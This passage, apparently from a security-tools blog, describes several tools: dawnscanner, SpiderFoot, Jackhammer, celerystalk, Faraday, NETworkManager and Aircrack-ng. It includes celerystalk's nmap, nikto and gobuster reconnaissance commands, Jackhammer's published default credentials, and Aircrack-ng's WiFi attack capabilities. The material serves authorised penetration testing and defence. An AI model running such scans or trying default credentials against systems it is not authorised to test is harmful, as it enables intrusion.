    $ dawn a_sinatra_webapp_directory
    $ dawn -C the_rails_blog_engine
    $ dawn -C --json a_sinatra_webapp_directory
    $ dawn --ascii-tabular-report my_rails_blog_ecommerce
    $ dawn --html -F my_report.html my_rails_blog_ecommerce

    -G, --gem-lock force dawn to scan only for vulnerabilities affecting dependencies in Gemfile.lock (DEPRECATED)
    -d, --dependencies force dawn to scan only for vulnerabilities affecting dependencies in Gemfile.lock

    Reporting

    -a, --ascii-tabular-report cause dawn to format findings using tables in ascii art (DEPRECATED)
    -j, --json cause dawn to format findings using json
    -K, --console cause dawn to format findings using plain ascii text
    -C, --count-only dawn will only count vulnerabilities (useful for scripts)
    -z, --exit-on-warn dawn will return number of found vulnerabilities as exit code
    -F, --file filename tells dawn to write output to filename
    -c, --config-file filename tells dawn to load configuration from filename

    Disable security check family

    --disable-cve-bulletins disable all CVE security checks
    --disable-code-quality disable all code quality checks
    --disable-code-style disable all code style checks
    --disable-owasp-ror-cheatsheet disable all Owasp Ruby on Rails cheatsheet checks
    --disable-owasp-top-10 disable all Owasp Top 10 checks

    Flags useful to query Dawn

    -S, --search-knowledge-base [check_name] search check_name in the knowledge base
    --list-knowledge-base list knowledge-base content
    --list-known-families list security check families contained in dawn's knowledge base
    --list-known-framework list ruby MVC frameworks supported by dawn
    --list-scan-registry list past scan informations stored in scan registry

    Service flags

    -D, --debug enters dawn debug mode
    -V, --verbose the output will be more verbose
    -v, --version show version information
    -h, --help show this help

    Rake task
    To include dawnscanner in your rake task list, you simply have to put this line in your Rakefile:
    require 'dawn/tasks'
    Then, executing $ rake -T, you will see a dawn:run task you can execute.
    $ rake -T
    ...
    rake dawn:run # Execute dawnscanner on the current directory
    ...

    Interacting with the knowledge base
    You can dump all security checks in the knowledge base this way
    $ dawn --list-knowledge-base
    Useful in scripts, you can use --search-knowledge-base or -S with the check name as parameter to see whether it's implemented as a security control or not.
    $ dawn -S CVE-2013-6421
    07:59:30 [*] dawn v1.1.0 is starting up
    CVE-2013-6421 found in knowledgebase.

    $ dawn -S this_test_does_not_exist
    08:02:17 [*] dawn v1.1.0 is starting up
    this_test_does_not_exist not found in knowledgebase

    dawnscanner security scan in action
    As output, dawnscanner will print all the security checks that failed during the scan.
    This is the result of dawnscanner running against a Sinatra 1.4.2 web application written for a talk I delivered in 2013 at the Railsberry conference.
    As you may see, dawnscanner first detects the MVC framework the application is running by looking at Gemfile.lock, then it discards all security checks not applicable to Sinatra (49 security checks, in version 1.0, especially designed for Ruby on Rails) and applies the remaining ones.
    $ dawn ~/src/hacking/railsberry2013
    18:40:27 [*] dawn v1.1.0 is starting up
    18:40:27 [$] dawn: scanning /Users/thesp0nge/src/hacking/railsberry2013
    18:40:27 [$] dawn: sinatra v1.4.2 detected
    18:40:27 [$] dawn: applying all security checks
    18:40:27 [$] dawn: 109 security checks applied - 0 security checks skipped
    18:40:27 [$] dawn: 1 vulnerabilities found
    18:40:27 [!] dawn: CVE-2013-1800 check failed
    18:40:27 [$] dawn: Severity: high
    18:40:27 [$] dawn: Priority: unknown
    18:40:27 [$] dawn: Description: The crack gem 0.3.1 and earlier for Ruby does not properly restrict casts of string values, which might allow remote attackers to conduct object-injection attacks and execute arbitrary code, or cause a denial of service (memory and CPU consumption) by leveraging Action Pack support for (1) YAML type conversion or (2) Symbol type conversion, a similar vulnerability to CVE-2013-0156.
    18:40:27 [$] dawn: Solution: Please use crack gem version 0.3.2 or above. Correct your gemfile
    18:40:27 [$] dawn: Evidence:
    18:40:27 [$] dawn: Vulnerable crack gem version found: 0.3.1
    18:40:27 [*] dawn is leaving

    When you run dawnscanner on a web application with up to date dependencies, it's likely to return a friendly no vulnerabilities found message. Keep working that way!
    This is dawnscanner running against a Padrino web application I wrote for a scorecard quiz game about application security. Italian language only. Sorry.
    18:42:39 [*] dawn v1.1.0 is starting up
    18:42:39 [$] dawn: scanning /Users/thesp0nge/src/CORE_PROJECTS/scorecard
    18:42:39 [$] dawn: padrino v0.11.2 detected
    18:42:39 [$] dawn: applying all security checks
    18:42:39 [$] dawn: 109 security checks applied - 0 security checks skipped
    18:42:39 [*] dawn: no vulnerabilities found.
    18:42:39 [*] dawn is leaving
    If you need a fancy HTML report about your scan, just ask dawnscanner with the --html flag used together with the --file flag, since we want to save the HTML to disk.
    $ dawn /Users/thesp0nge/src/hacking/rt_first_app --html --file report.html

    09:00:54 [*] dawn v1.1.0 is starting up
    09:00:54 [*] dawn: report.html created (2952 bytes)
    09:00:54 [*] dawn is leaving

    Useful links
    Project homepage: http://dawnscanner.org
    Twitter profile: @dawnscanner
    Github repository: https://github.com/thesp0nge/dawnscanner
    Mailing list: https://groups.google.com/forum/#!forum/dawnscanner

    Thanks to
    saten: first issue posted about a typo in the README
    presidentbeef: for his outstanding work that inspired me in creating dawn and for double checking the comparison matrix. Issue #2 is yours :)
    marinerJB: for misc bug reports and further ideas
    Matteo: for ideas on API and their usage with github.com hooks


    SpiderFoot - The Most Complete OSINT Collection And Reconnaissance Tool


    SpiderFoot is an open source intelligence (OSINT) automation tool. Its goal is to automate the process of gathering intelligence about a given target, which may be an IP address, domain name, hostname, network subnet, ASN or person's name.
    SpiderFoot can be used offensively, i.e. as part of a black-box penetration test to gather information about the target, or defensively, to identify what information your organisation is freely providing for attackers to use against you.

    What is SpiderFoot?

    SpiderFoot is a reconnaissance tool that automatically queries over 100 public data sources (OSINT) to gather intelligence on IP addresses, domain names, e-mail addresses, names and more. You simply specify the target you want to investigate, pick which modules to enable and then SpiderFoot will collect data to build up an understanding of all the entities and how they relate to each other.

    What is OSINT?

    OSINT (Open Source Intelligence) is data available in the public domain which might reveal interesting information about your target. This includes DNS, Whois, web pages, passive DNS, spam blacklists, file metadata, threat intelligence lists as well as services like SHODAN, HaveIBeenPwned? and more. See the full list of data sources SpiderFoot utilises.

    What can I do with SpiderFoot?

    The data returned from a SpiderFoot scan will reveal a lot of information about your target, providing insight into possible data leaks, vulnerabilities or other sensitive information that can be leveraged during a penetration test, red team exercise or for threat intelligence. Try it out against your own network to see what you might have exposed!

    Read more at the project website: http://www.spiderfoot.net


    Jackhammer - One Security Vulnerability Assessment/Management Tool To Solve All The Security Team Problems


    One Security vulnerability assessment/management tool to solve all the security team problems.

    What is Jackhammer?
    Jackhammer is a collaboration tool built with the aim of bridging the gap between the security team and the dev and QA teams, and of being a facilitator for TPMs to understand and track the quality of the code going into production. It can do static code analysis and dynamic analysis, with built-in vulnerability management capability. It finds security vulnerabilities in the target applications and helps security teams manage the chaos in this new age of continuous integration and continuous/multiple deployments.
    It works completely on RBAC (Role Based Access Control). There are cool dashboards for individual scans and team scans, giving ample flexibility to collaborate with different teams. It is built on a fully pluggable architecture which can be integrated with any open source/commercial tool.
    Jackhammer uses the OWASP pipeline project to run multiple open source and commercial tools against your code, web app, mobile app, CMS (wordpress), and network.

    Key Features:
    • Provides unified interface to collaborate on findings
    • Scanning (code) can be done for all code management repositories
    • Scheduling of scans based on intervals (daily, weekly, monthly)
    • Advanced false positive filtering
    • Publish vulnerabilities to bug tracking systems
    • Keep a tab on statistics and vulnerability trends in your applications
    • Integrates with majority of open source and commercial scanning tools
    • Users and Roles management giving greater control
    • Configurable severity levels on list of findings across the applications
    • Built-in vulnerability status progression
    • Easy to use filters to review targeted sets from tons of vulnerabilities
    • Asynchronous scanning (via sidekiq) that scales
    • Seamless Vulnerability Management
    • Track statistics and graph security trends in your applications
    • Easily integrates with a variety of open source, commercial and custom scanning tools

    Supported Vulnerability Scanners:

    Static Analysis:
       * license required      ** commercial license required

    Finding hard coded secrets/tokens/creds:
    • Trufflehog (Slightly modified/extended for better result and integration as of May 2017)

    Webapp:

    Mobile App:
    • Androbugs (Slightly modified/extended for better result and integration as of May 2017)
    • Androguard (Slightly modified/extended for better result and integration as of May 2017)

    Wordpress:
    • WPScan (Slightly modified/extended for better result and integration as of May 2017)

    Network:

    Adding Custom (other open source/commercial /personal) Scanners:
    You can add any scanner to jackhammer within 10-30 minutes. Check the links/video

    Quick Start and Installation
    See our Quick Start/Installation Guide if you want to try out Jackhammer as quickly as possible using Docker Compose.

    Run the following commands for local setup (corporate mode):
     git clone https://github.com/olacabs/jackhammer
    sh ./docker-build.sh

    Default credentials for local setup:
    username: jackhammer@olacabs.com
    password: j4ckh4mm3r

    (For single user mode)
    sh ./docker-build.sh SingleUser
    then sign up for access

    Restarting Jackhammer
    docker-compose stop
    docker-compose rm
    docker-compose up -d

    User Guide
    The User Guide will give you an overview of how to use Jackhammer once you have things up and running.

    Demo

    Demo Environment Link:
    https://jch.olacabs.com/

    Default credentials:
    username: admin@admin.com
    password: admin@admin.com

    Credits
    Sentinels Team @Ola

    Shout-out to:
    -Madhu
    -Habi
    -Krishna
    -Shreyas
    -Krutarth
    -Naveen
    -Mohan


    Celerystalk - An Asynchronous Enumeration and Vulnerability Scanner


    celerystalk helps you automate your network scanning/enumeration process with asynchronous jobs (aka tasks) while retaining full control of which tools you want to run.
    • Configurable - Some common tools are in the default config, but you can add any tool you want
    • Service Aware - Uses nmap/nessus service names rather than port numbers to decide which tools to run
    • Scalable - Designed for scanning multiple hosts, but works well for scanning one host at a time
    • VirtualHosts - Supports subdomain recon and virtualhost scanning
    • Job Control - Supports canceling, pausing, and resuming of tasks, inspired by Burp scanner
    • Screenshots - Automatically takes screenshots of every URL identified via brute force (gobuster) and spidering (Photon)

    Install/Setup
    • Supported Operating Systems: Kali
    • Supported Python Version: 2.x
    You must install and run celerystalk as root
    # git clone https://github.com/sethsec/celerystalk.git
    # cd celerystalk/setup
    # ./install.sh
    # cd ..
    # ./celerystalk -h

    Using celerystalk - The basics
    [CTF/HackTheBox mode] - How to scan a host by IP
    # nmap 10.10.10.10 -Pn -p- -sV -oX tenten.xml                       # Run nmap
    # ./celerystalk workspace create -o /htb # Create default workspace and set output dir
    # ./celerystalk import -f tenten.xml # Import scan
    # ./celerystalk db services # If you want to see what services were loaded
    # ./celerystalk scan # Run all enabled commands
    # ./celerystalk query watch (then Ctrl+c) # Watch scans as they move from pending > running > complete
    # ./celerystalk report # Generate report
    # firefox /htb/celerystalkReports/Workspace-Report[Default].html & # View report
    [Vulnerability Assessment Mode] - How to scan a list of in-scope hosts/networks and any subdomains that resolve to any of the in-scope IPs
    # nmap -iL client-inscope-list.txt -Pn -p- -sV -oX client.xml       # Run nmap
    # ./celerystalk workspace create -o /assessments/client # Create default workspace and set output dir
    # ./celerystalk import -f client.xml -S scope.txt # Import scan and scope files
    # ./celerystalk subdomains -d client.com,client.net # Find subdomains and determine if in scope
    # ./celerystalk scan # Run all enabled commands
    # ./celerystalk query watch (then Ctrl+c) # Wait for scans to finish
    # ./celerystalk report # Generate report
    # firefox <path>/celerystalkReports/Workspace-Report[Default].html &# View report
    [URL Mode] - How to scan a URL (use this mode to scan sub-directories found during the first wave of scans).
    # ./celerystalk workspace create -o /assessments/client             # Create default workspace and set output dir
    # ./celerystalk scan -u http://10.10.10.10/secret_folder/ # Run all enabled commands
    # ./celerystalk query watch (then Ctrl+c) # Wait for scans to finish
    # ./celerystalk report # Generate report
    # firefox <path>/celerystalkReports/Workspace-Report[Default].html &# View report

    Using celerystalk - Some more detail
    1. Configure which tools you'd like celerystalk to execute: The install script drops a config.ini file in the celerystalk folder. The config.ini file is broken up into three sections:
      Service Mapping - The first section normalizes Nmap & Nessus service names for celerystalk (this idea comes from @codingo_'s Reconnoitre, AFAIK).
      [nmap-service-names]
      http = http,http-alt,http-proxy,www,http?
      https = ssl/http,https,ssl/http-alt,ssl/http?
      ftp = ftp,ftp?
      mysql = mysql
      dns = dns,domain,domain
      Domain Recon Tools - The second section defines the tools you'd like to use for subdomain discovery (an optional feature):
      [domain-recon]
      amass : /opt/amass/amass -d [DOMAIN]
      sublist3r : python /opt/Sublist3r/sublist3r.py -d [DOMAIN]
      Service Configuration - The rest of the config.ini sections define which commands you want celerystalk to run for each identified service (i.e., http, https, ssh).
      • Disable any command by commenting it out with a ; or a #.
      • Add your own commands using the [TARGET], [PORT], and [OUTPUT] placeholders (expansion is sketched after the example below).
      Here is an example:
      [http]
      whatweb : whatweb http://[TARGET]:[PORT] -a3 --colour=never > [OUTPUT].txt
      cewl : cewl http://[TARGET]:[PORT]/ -m 6 -w [OUTPUT].txt
      curl_robots : curl http://[TARGET]:[PORT]/robots.txt --user-agent 'Googlebot/2.1 (+http://www.google.com/bot.html)' --connect-timeout 30 --max-time 180 > [OUTPUT].txt
      nmap_http_vuln : nmap -sC -sV -Pn -v -p [PORT] --script=http-vuln* [TARGET] -d -oN [OUTPUT].txt -oX [OUTPUT].xml --host-timeout 120m --script-timeout 20m
      nikto : nikto -h http://[TARGET] -p [PORT] &> [OUTPUT].txt
      gobuster-common : gobuster -u http://[TARGET]:[PORT]/ -k -w /usr/share/seclists/Discovery/Web-Content/common.txt -s '200,204,301,302,307,403,500' -e -n -q > [OUTPUT].txt
      photon : python /opt/Photon/photon.py -u http://[TARGET]:[PORT] -o [OUTPUT]
      ;gobuster_2.3-medium : gobuster -u http://[TARGET]:[PORT]/ -k -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -s '200,204,301,307,403,500' -e -n -q > [OUTPUT].txt
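      A minimal sketch of how this placeholder expansion could work (illustrative Python, not celerystalk's actual code; the function name and values are made up):

      # Illustrative [TARGET]/[PORT]/[OUTPUT] expansion for config.ini command templates.
      def expand_command(template, target, port, output_base):
          """Replace the config.ini placeholders in a command template."""
          return (template.replace('[TARGET]', target)
                          .replace('[PORT]', str(port))
                          .replace('[OUTPUT]', output_base))

      cmd = expand_command(
          "whatweb http://[TARGET]:[PORT] -a3 --colour=never > [OUTPUT].txt",
          target='10.10.10.10', port=80, output_base='/htb/10.10.10.10/whatweb')
      print(cmd)
      # -> whatweb http://10.10.10.10:80 -a3 --colour=never > /htb/10.10.10.10/whatweb.txt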
    2. Run Nmap or Nessus:
      • Nmap: Run nmap against your target(s). Required: enable version detection (-sV) and output to XML (-oX filename.xml). All other nmap options are up to you. Here are some examples:
         nmap target(s) -Pn -p- -sV -oX filename.xml 
        nmap -iL target_list.txt -Pn -sV -oX filename.xml
      • Nessus: Run nessus against your target(s) and export results as a .nessus file
    3. Create workspace:
      Option - Description
      no options - Prints current workspace
      create - Creates new workspace
      -w - Define new workspace name
      -o - Define output directory assigned to workspace
        Create default workspace    ./celerystalk workspace create -o /assessments/client
      Create named workspace ./celerystalk workspace create -o /assessments/client -w client
      Switch to another workspace ./celerystalk workspace client
    4. Import Data: Import data into celerystalk
      Option - Description
      -f scan.xml - Nmap/Nessus xml
      • Adds all IP addresses from this file to the hosts table and marks them all in scope to be scanned.
      • Adds all ports and service types to the services table.
      -S scope.txt - Scope file
      • Adds the IPs/ranges from the scope file to the hosts table and marks them in scope to be scanned.
      -D subdomains.txt - (sub)Domains file
      • celerystalk determines whether each subdomain is in scope by resolving the IP and looking for the IP in the DB. If there is a match, the domain is marked as in scope and will be scanned.
      Import Nmap XML file:       ./celerystalk import -f /assessments/nmap.xml
      Import Nessus file: ./celerystalk import -f /assessments/scan.nessus
      Import list of Domains: ./celerystalk import -D <file>
      Import list of IPs/Ranges: ./celerystalk import -S <file>
      Specify workspace: ./celerystalk import -f <file> -w workspace
      Import multiple files: ./celerystalk import -f nmap.xml -S scope.txt -D domains.txt
    5. Find Subdomains (Optional): celerystalk will perform subdomain recon using the tools specified in the config.ini.
      Option - Description
      -d domain1,domain2,etc - Run Amass, Sublist3r, etc. and store domains in DB
      • After running your subdomain recon tools, celerystalk determines whether each subdomain is in scope by resolving the IP and looking for the IP in the DB. If there is a match, the domain is marked as in scope and will be scanned (see the sketch below).
      Find subdomains:       celerystalk subdomains -d domain1.com,domain2.com
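      The in-scope check described above amounts to a DNS resolution plus a set lookup; a minimal sketch (the in_scope_ips set stands in for the IPs celerystalk keeps in its DB):

      # Sketch of the in-scope decision for discovered subdomains.
      import socket

      def is_in_scope(subdomain, in_scope_ips):
          try:
              ip = socket.gethostbyname(subdomain)
          except socket.gaierror:
              return False          # does not resolve -> out of scope
          return ip in in_scope_ips

      print(is_in_scope('sub.client.com', {'10.0.0.1', '10.0.0.3'}))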
    6. Launch Scan: I recommend using the import command first and running scan with no options; however, you do have the option to do it all at once (import and scan) by using the flags below. celerystalk will submit tasks to celery, which asynchronously executes them and logs output to your output directory.
      Option - Description
      no options - Scan all in scope hosts
      • Reads DB and scans every in scope IP and subdomain.
      • Launches all enabled tools for IPs, but only http/https-specific tools against virtualhosts
      -t ip,vhost,cidr - Scan specific target(s) from DB or scan file
      • Scan a subset of the in scope IPs and/or subdomains.
      -s - Simulation
      • Sends all of the tasks to celery, but all commands are executed with a # before them, rendering them inert.
      Use these only if you want to skip the import phase and import/scan all at once:
      -f scan.xml - Import and process Nmap/Nessus xml before scan
      • Adds all IP addresses from this file to the hosts table and marks them all in scope to be scanned.
      • Adds all ports and service types to the services table.
      -S scope.txt - Import and process scope file before scan
      • Adds the IPs/ranges from the scope file to the hosts table and marks them in scope to be scanned.
      -D subdomains.txt - Import and process (sub)domains file before scan
      • celerystalk determines whether each subdomain is in scope by resolving the IP and looking for the IP in the DB. If there is a match, the domain is marked as in scope and will be scanned.
      -d domain1,domain2,etc - Find Subdomains and scan in scope hosts
      • After running your subdomain recon tools, celerystalk determines whether each subdomain is in scope by resolving the IP and looking for the IP in the DB. If there is a match, the domain is marked as in scope and will be scanned.
      Scan imported hosts/subdomains
      Scan all in scope hosts:    ./celerystalk scan    
      Scan subset of DB hosts: ./celerystalk scan -t 10.0.0.1,10.0.0.3
      ./celerystalk scan -t 10.0.0.100-200
      ./celerystalk scan -t 10.0.0.0/24
      ./celerystalk scan -t sub.domain.com
      Simulation mode: ./celerystalk scan -s
      Import and Scan
      Start from Nmap XML file:   ./celerystalk scan -f /pentest/nmap.xml -o /pentest
      Start from Nessus file: ./celerystalk scan -f /pentest/scan.nessus -o /pentest
      Scan all in scope vhosts: ./celerystalk scan -f <file> -o /pentest -d domain1.com,domain2.com
      Scan subset hosts in XML: ./celerystalk scan -f <file> -o /pentest -t 10.0.0.1,10.0.0.3
      ./celerystalk scan -f <file> -o /pentest -t 10.0.0.100-200
      ./celerystalk scan -f <file> -o /pentest -t 10.0.0.0/24
      Simulation mode: ./celerystalk scan -f <file> -o /pentest -s
    7. Rescan: Use this command to rescan an already scanned host.
      Option - Description
      no option - For each in scope host in the DB, celerystalk will ask if you want to rescan it
      -t ip,vhost,cidr - Scan a subset of the in scope IPs and/or subdomains.
      Rescan all hosts:           ./celerystalk rescan
      Rescan some hosts: ./celerystalk rescan -t 1.2.3.4,sub.domain.com
      Simulation mode: ./celerystalk rescan -s
    8. Query Status: Asynchronously check the status of the task queue as frequently as you like. The watch mode actually executes the linux watch command so you don't fill up your entire terminal buffer.
      Option - Description
      no options - Shows all tasks in the default workspace
      watch - Sends the command to the unix watch command, which will give you an updated status every 2 seconds
      brief - Limit of 5 results per status (pending/running/completed/cancelled/paused)
      summary - Shows only a banner with numbers and not the tasks themselves
      Query Tasks:                ./celerystalk query 
      ./celerystalk query watch
      ./celerystalk query brief
      ./celerystalk query summary
      ./celerystalk query summary watch
    9. Cancel/Pause/Resume Tasks: Cancel/Pause/Resume any task(s) that are currently running or in the queue.
      Option - Description
      cancel
      • Canceling a running task will send a kill -TERM.
      • Canceling a queued task* will make celery ignore it (uses celery's revoke).
      • Canceling all tasks* will kill running tasks and revoke all queued tasks.
      pause
      • Pausing a single task uses kill -STOP to suspend the process.
      • Pausing all tasks* attempts to kill -STOP all running tasks, but it is a little wonky and you might need to run it a few times. It is possible a job completed before it was able to be paused, which means you will have a worker that is still accepting new jobs.
      resume
      • Resuming tasks* sends a kill -CONT, which allows the process to start up again where it left off (see the signal sketch after the examples below).
      Cancel/Pause/Resume Tasks:  ./celerystalk <verb> 5,6,10-20          #Cancel/Pause/Resume tasks 5, 6, and 10-20 from current workspace
      ./celerystalk <verb> all #Cancel/Pause/Resume all tasks from current workspaces
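      The STOP/CONT mechanics described above can be pictured with plain Python signals (a rough sketch only; celerystalk's own task bookkeeping is more involved):

      # Pause/resume/cancel a process the way the job control above describes:
      # SIGSTOP suspends, SIGCONT resumes, SIGTERM cancels.
      import os, signal, subprocess, time

      proc = subprocess.Popen(['sleep', '60'])   # stand-in for a running scan task
      os.kill(proc.pid, signal.SIGSTOP)          # pause
      time.sleep(1)
      os.kill(proc.pid, signal.SIGCONT)          # resume
      os.kill(proc.pid, signal.SIGTERM)          # cancel
      proc.wait()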
    10. Run Report: Run a report which combines all of the tool output into an html file and a txt file. Run this as often as you like. Each time you run the report it overwrites the previous report.
      Create Report:              ./celerystalk report                    #Create a report for all scanned hosts in current workspace
      Screenshot:

    11. Access the DB: List the workspaces, hosts, services, or paths stored in the celerystalk database
      Option - Description
      workspaces - Show all known workspaces and the output directory associated with each workspace
      services - Show all known open ports and service types by IP
      hosts - Show all hosts (IP addresses and subdomains/vhosts), whether they are in scope, and whether they have been submitted for scanning
      paths - Show all paths that have been identified by vhost
      -w workspace - Specify a non-default workspace
      Show workspaces:            ./celerystalk db workspaces
      Show services: ./celerystalk db services
      Show hosts: ./celerystalk db hosts
      Show paths: ./celerystalk db paths
    12. Export DB: Export each table of the DB to a csv file
      Option - Description
      no options - Export the services, hosts, and paths tables from the default database
      -w workspace - Specify a non-default workspace
      Export current DB:        ./celerystalk db export
      Export another DB: ./celerystalk db export -w test

    Usage
    Usage:
    celerystalk workspace create -o <output_dir> [-w workspace_name]
    celerystalk workspace [<workspace_name>]
    celerystalk import [-f <nmap_file>] [-S scope_file] [-D subdomains_file] [-u <url>]
    celerystalk subdomains -d <domains> [-s]
    celerystalk scan [-f <nmap_file>] [-t <targets>] [-d <domains>] [-S scope_file] [-D subdomains_file] [-s]
    celerystalk scan -u <url> [-s]
    celerystalk rescan [-t <targets>] [-s]
    celerystalk query ([full] | [summary] | [brief]) [watch]
    celerystalk query [watch] ([full] | [summary] | [brief])
    celerystalk report
    celerystalk cancel ([all]|[<task_ids>])
    celerystalk pause ([all]|[<task_ids>])
    celerystalk resume ([all]|[<task_ids>])
    celerystalk db ([workspaces] | [services] | [hosts] | [vhosts] | [paths])
    celerystalk db export
    celerystalk shutdown
    celerystalk interactive
    celerystalk (help | -h | --help)

    Options:
    -h --help Show this screen
    -v --version Show version
    -f <nmap_file> Nmap xml import file
    -o <output_dir> Output directory
    -S <scope_file> Scope import file
    -D <subdomains_file> Subdomains import file
    -t <targets> Target(s): IP, IP Range, CIDR
    -u <url> URL to parse and scan with all configured tools
    -w <workspace> Workspace
    -d --domains Domains to scan for vhosts
    -s --simulation Simulation mode. Submits tasks but comments out all commands

    Examples:

    Workspace
    Create default workspace celerystalk workspace create -o /assessments/client
    Create named workspace celerystalk workspace create -o /assessments/client -w client
    Switch to another workspace celerystalk workspace client2

    Import
    Import Nmap XML file: celerystalk import -f /assessments/nmap.xml
    Import Nessus file: celerystalk import -f /assessments/scan.nessus
    Import list of Domains: celerystalk import -D <file>
    Import list of IPs/Ranges: celerystalk import -S <file>
    Import multiple files: celerystalk import -f nmap.xml -S scope.txt -D domains.txt

    Subdomain Recon
    Find subdomains: celerystalk subdomains -d domain1.com,domain2.com

    Scan
    Scan all in scope hosts: celerystalk scan
    Scan subset of DB hosts: celerystalk scan -t 10.0.0.1,10.0.0.3
    celerystalk scan -t 10.0.0.100-200
    celerystalk scan -t 10.0.0.0/24
    celerystalk scan -t sub.domain.com
    Simulation mode: celerystalk scan -s

    Import and Scan
    Start from Nmap XML file: celerystalk scan -f /pentest/nmap.xml
    Start from Nessus file: celerystalk scan -f /pentest/scan.nessus
    Scan subset hosts in XML: celerystalk scan -f <file> -t 10.0.0.1,10.0.0.3
    celerystalk scan -f <file> -t 10.0.0.100-200
    celerystalk scan -f <file> -t 10.0.0.0/24
    celerystalk scan -f <file> -t sub.domain.com
    Simulation mode: celerystalk scan -f <file> -s

    Rescan
    Rescan all hosts: celerystalk rescan
    Rescan some hosts: celerystalk rescan -t 1.2.3.4,sub.domain.com
    Simulation mode: celerystalk rescan -s

    Query Mode
    All tasks: celerystalk query
    Update status every 2s: celerystalk query watch
    Show only 5 tasks per mode: celerystalk query brief
    Show stats only: celerystalk query summary
    Show stats every 2s: celerystalk query summary watch

    Job Control (cancel/pause/resume)
    Specific tasks: celerystalk cancel 5,6,10-20
    celerystalk pause 5,6,10-20
    celerystalk resume 5,6,10-20

    All tasks in current workspace: celerystalk cancel all
    celerystalk pause all
    celerystalk resume all

    Access the DB
    Show workspaces: celerystalk db workspaces
    Show services: celerystalk db services
    Show hosts: celerystalk db hosts
    Show vhosts only: celerystalk db vhosts
    Show paths: celerystalk db paths

    Export DB
    Export current DB: celerystalk db export

    Credit
    This project was inspired by many great tools:
    1. https://github.com/codingo/Reconnoitre by @codingo_
    2. https://github.com/frizb/Vanquish by @frizb
    3. https://github.com/leebaird/discover by @discoverscripts
    4. https://github.com/1N3/Sn1per
    5. https://github.com/SrFlipFlop/Network-Security-Analysis by @SrFlipFlop
    Thanks to @offensivesecurity and @hackthebox_eu for their lab networks
    Also, thanks to:
    1. @decidedlygray for pointing me towards celery, helping me solve python problems that were over my head, and for the extensive beta testing
    2. @kerpanic for inspiring me to dust off an old project and turn it into celerystalk
    3. My TUV OpenSky team and my IthacaSec hackers for testing this out and submitting bugs and features


    Faraday v3.4 - Collaborative Penetration Test and Vulnerability Management Platform


    Here are the main new features and improvements in Faraday v3.4:

    Services can now be tagged. With this new feature, you can easily identify important services, geolocate them and more.
    New search operators OR/NOT
    In a previous release we added the AND operator; now with 3.4 you can also use the OR and NOT operators in the Status Report search box.
    This will allow you to find vulnerabilities easily with filters like this one:
    (severity:critical or severity:high) or name:"MS18-172"
    Performance improvements for big workspaces
    We have been working on optimizing our REST API endpoints to support millions of vulnerabilities in each workspace.

    Here is the full change log for version 3.4
    • In GTK, check that active_workspace is not null
    • Add fbruteforce services fplugin
    • Attachments can be added to a vulnerability through the API.
    • Catch gaierror error on lynis plugin
    • Add OR and NOT with parenthesis support on status report search
    • Info API now is public
    • Web UI now detects Appscan plugin
    • Improve performance on the workspace using custom query
    • Workspaces can be set as active/disable in the welcome page.
    • Changed Nmap plugin: the response field in VulnWeb now goes to the Data field.
    • Update code to support latest SQLAlchemy version
    • Fix `create_vuln` fplugin bug that incorrectly reported duplicated vulns
    • The client can set a custom logo to Faraday
    • Centered checkboxes in user list page
    • Client or pentester can't activate/deactivate workspaces
    • In GTK, dialogs now check that user_info is not False
    • Add tags in Service object (Frontend and backend API)
    • Limit of users only takes the active ones
    • Improve error message when the license is not valid



    NETworkManager - A Powerful Tool For Managing Networks And Troubleshoot Network Problems!


    A powerful tool for managing networks and troubleshooting network problems!

    Features
    • Network Interface - Information, Configure
    • IP-Scanner
    • Port-Scanner
    • Ping
    • Traceroute
    • DNS Lookup
    • Remote Desktop
    • PuTTY (requires PuTTY)
    • TightVNC (requires TightVNC)
    • SNMP - Get, Walk, Set (v1, v2c, v3)
    • Wake on LAN
    • HTTP Headers
    • Whois
    • Subnet Calculator - Calculator, Subnetting, Supernetting
    • Lookup - OUI, Port
    • Connections
    • Listeners
    • ARP Table

    Languages
    • English
    • German
    • Russian
    • Spanish

    System requirements

    Aircrack-ng 1.5 - Complete Suite Of Tools To Assess WiFi Network Security


    Aircrack-ng is a complete suite of tools to assess WiFi network security.
    It focuses on different areas of WiFi security:
    • Monitoring: Packet capture and export of data to text files for further processing by third party tools.
    • Attacking: Replay attacks, deauthentication, fake access points and others via packet injection.
    • Testing: Checking WiFi cards and driver capabilities (capture and injection).
    • Cracking: WEP and WPA PSK (WPA 1 and 2).
    All tools are command line, which allows for heavy scripting. A lot of GUIs have taken advantage of this feature. It works primarily on Linux, but also Windows, OS X, FreeBSD, OpenBSD, NetBSD, as well as Solaris and even eComStation 2.

    Building

    Requirements
    • Autoconf
    • Automake
    • Libtool
    • shtool
    • OpenSSL development package or libgcrypt development package.
    • Airmon-ng (Linux) requires ethtool.
    • On Windows, Cygwin has to be used, and it also requires the w32api package.
    • On Windows, if using clang, libiconv and libiconv-devel
    • Linux: LibNetlink 1 or 3. It can be disabled by passing --disable-libnl to configure.
    • pkg-config (pkgconf on FreeBSD)
    • FreeBSD, OpenBSD, NetBSD, Solaris and OS X with macports: gmake
    • Linux/Cygwin: make and Standard C++ Library development package (Debian: libstdc++-dev)

    Optional stuff
    • If you want SSID filtering with regular expressions in airodump-ng (--essid-regex), the PCRE development package is required.
    • If you want to use airolib-ng and the '-r' option in aircrack-ng, the SQLite development package >= 3.3.17 is required (3.6.X version or better is recommended)
    • If you want to use Airpcap, the 'developer' directory from the CD/ISO/SDK is required.
    • In order to build besside-ng, besside-ng-crawler, easside-ng, tkiptun-ng and wesside-ng, the libpcap development package is required (on Cygwin, use the Airpcap SDK instead; see above)
    • For best performance on FreeBSD (50-70% more), install gcc8 (or better) via: pkg install gcc8
    • rfkill
    • For best performance on SMP machines, ensure the hwloc library and headers are installed. It is strongly recommended on high core count systems, where it may give a serious speed boost
    • CMocka for unit testing

    Installing required and optional dependencies
    Below are instructions for installing the basic requirements to build aircrack-ng for a number of operating systems.
    Note: CMocka should not be a dependency when packaging Aircrack-ng.

    Linux

    Debian/Ubuntu
    sudo apt-get install build-essential autoconf automake libtool pkg-config libnl-3-dev libnl-genl-3-dev libssl-dev ethtool shtool rfkill zlib1g-dev libpcap-dev libsqlite3-dev libpcre3-dev libhwloc-dev libcmocka-dev

    Fedora/CentOS/RHEL
    sudo yum install libtool pkgconfig sqlite-devel autoconf automake openssl-devel libpcap-devel pcre-devel rfkill libnl3-devel gcc gcc-c++ ethtool hwloc-devel libcmocka-devel

    BSD

    FreeBSD
